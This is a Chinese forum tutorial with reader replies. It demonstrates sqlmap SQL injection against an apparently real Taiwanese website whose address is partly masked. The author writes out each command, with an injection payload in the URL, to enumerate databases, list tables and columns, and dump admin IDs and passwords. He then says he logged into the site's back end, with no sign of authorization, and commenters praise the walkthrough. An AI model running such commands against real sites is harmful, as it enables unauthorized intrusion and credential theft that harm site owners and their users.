最新的backtrack5(bt5)官方网站已经提供下载,backtrack5是基于ubuntu Lucid LTS. 内核2.6.38开发的,完全开源并和GPL兼容。

Backtrack 中文网

 找回密码
 立即注册

QQ登录

只需一步,快速开始

扫一扫,访问微社区

搜索
查看: 16523|回复: 9

[教程] 实战演示sqlmap注入攻击

 [复制链接]
卫泓
原蔓菁
0x0  写在前
今天给大家写一下运用sqlmap实战演示检测网站,下面网站url我会尽量缩写和打乱,但是这是一个真实存在的站点,只是不希望发出来大家去造成太大的破坏,而且本教程只是提供对sqlmap这个工具的认知以及最基础的使用,希望大家在做检测的时候不要做过激的行为,好了废话不多说。
0x1 事件经过

今晚某群一个人说他的w3af不能正常使用,因为他已经知道这个站存在注入点但是用工具却扫不出来,后来我就问他要了这个网站做了初级的检测后发现存在sql注入点,url: http://www.poxxxcom.tw/pron.php ... %20%2715%27%3D%2715,一个台湾的站点,接下来就开始今天的主讲。


0x2 Sqlmap注入点检测

打开sqlmap,先把url丢给sqlmap去跑,命令:
  1. sqlmap -u http://www.poxxcom.tw/pron.php?cid=15%27%20OR%20%2715%27%3D%271
复制代码


结果如下图:
QQ截图20151218213354.png

从图中我们可以看出,这个注入点提交的类型是get型,数据库为Mysql5.0.11,系统是Linux CentOS5.8,服务器版本是Apache2.2.3,确定这个注入点可行,接下来我们试试列出它的数据库。

0x3 Sqlmap列数据库
命令:
  1. sqlmap -u http://www.poxxcom.tw/pron.php?cid=15%27%20OR%20%2715%27%3D%2715 --dbs
复制代码
检测结果如下:
QQ截图20151212221439.png


已经列出4个数据库,这里我们列第三个,因为他是网站名称。

0x4 Sqlmap查询指定数据库中的表单
命令:
  1. sqlmap -u http://www.poxxcom.tw/prn.php?cid=15%27%20OR%20%2715%27%3D%2715 --tables -D "poxxx_db"
复制代码
检测结果如下图:

QQ截图20151213001731.png


0x5 Sqlmap查询指定表单内的字段
命令:
  1. sqlmap -u http://www.poxxcom.tw/pron.php?cid=15%27%20OR%20%2715%27%3D%2715 --columns -T "jt_admin" -D "poxxx_d"
复制代码
检测结果如下图:
QQ截图20151213001520.png


0x6 Sqlmap查询指定字段内的内容
命令:
  1. sqlmap -u http://www.poxxx.com.tw/pron.php?cid=15%27%20OR%20%2715%27%3D%2715 --dump -C "ID,password" -T "jt_admin" -D "proxxx_db"
复制代码
扫描结果如下:
QQ截图20151213001429.png

0x7 最后
  写这篇实战,让大家更了解和清楚的明白sqlmap这个工具的基础命令,这篇文章记录的时间也是可以看到的,洗澡吃饭都丢在那里检测的,还是那句话一切为了学习,希望大家在使用的过程中懂得把握得当,这篇教程只到这里,后台已经登录后退出。end

           -这是一个小广告






评分

参与人数 1 威望 +1 骨头 +38 收起 理由
blackeagle + 1 + 38 赞一个!

查看全部评分

+1
16534°C
9
  • lovekail
  • abs-阎
  • kundera29
  • Kuma
  • FR13ND
过: 他们
来又槐
历锦文
不错 写的很详细  学习了  
皮辰韦
芙菡
很基础的科普了!辛苦
沙代秋
佑枫

66666666666666666666666
永芷荷
曲世韵
为数不多写的很详细,每一步都注释的,对新手很好用,如果在前沿加上命令汇总最好了(虽然不一定需要)
澹台景焕
诸安吉
终于觉得我来对了地方,唉,为什么不早点注册呢。。
帖诗霜
姬慧心
Kuma 发表于 2017-4-6 10:51
为数不多写的很详细,每一步都注释的,对新手很好用,如果在前沿加上命令汇总最好了(虽然不一定需要)

好的,下次注意。
迟秀颖
沛灵
谢谢.写的详细.好好看.
正柔
锦美
学习了,不错不错 !!!!!
竭晓畅
阴宏义
能查询到数据库和表名,但是查询表显示不出内容,提示the SQL query provided does not return any output,请问是什么问题
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

BackTrack是一套专业的计算机安全检测的Linux操作系统,简称BT。BackTrack 是一个基于Ubuntu GNU/Linux的发行版本,主要用做数字取证和入侵测试。它的名字引用自回溯法(backtracking)。BackTrack 给用户提供了大量功能强大但简单易用的安全工具软件。BackTrack还支持Live CD和Live USB启动方式,用户可以直接从移动介质启动该系统而不用将系统安装在硬盘上。BackTrack被设计成一体化的旨在安全审计用的livecd,曾经它是被最广泛采用的渗透测试框架并被世界各地的安全社区所使用。现在,BackTrack已被Kali Linux所代替,BT将不再维护。
快速回复 返回顶部 返回列表